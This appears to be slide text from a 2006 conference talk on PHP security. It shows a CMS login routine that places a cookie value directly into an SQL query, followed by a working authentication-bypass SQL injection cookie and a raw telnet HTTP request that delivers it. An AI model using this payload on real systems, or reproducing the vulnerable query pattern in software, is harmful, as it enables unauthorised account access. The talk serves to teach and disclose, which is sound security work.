Attack ALert :: Magic Quotes

Attack ALert :: Magic Quotes :: Real World

Do NOT let magic_quotes_gpc determine the security of your application.
- Be aware of the requirements for your application.
Unnamed Popular CMS -- current stable version (as of 2006-04-20)

23.cf5dfc3f4e21fa3d1b0af26c9e72dffd

        
              // line: 1026 - init_session () [trimmed]
            
                list($uid, $upw)=explode(".", $_COOKIE[$pref['cookie_name']]);
            
              // line 1039
            
                if($result = get_user_data($uid, "AND md5(u.user_password)='{$upw}'", FALSE)) {
            
              // line: 783 - get_user_data ($uid, $extra, $force_join)
            
                $qry = "SELECT * FROM #user AS
              u WHERE u.user_id='{$uid}' {$extra}";
            
              // file: class2.php line: 785 - get_user_data ()
            
                if ($sql->db_Select_gen($qry))

1.%27%20OR%20%27a%27%20=%20%27a

        
              AND md5(u.user_password)='' OR 'a' =
              'a'

telnet host.net 80
GET /page.php HTTP/1.1
Host: host.net
Cookie: cookie=1.%27%20OR%20%27a%27%20=%20%27a

BTW: I have made the CMS vendor aware of this, and asked permission to talk about this vulnerability in this presentation.

Penguicon 2006

PHP Aplication Security

Attack ALert :: Magic Quotes :: Real World

Attack ALert :: Magic Quotes :: Real World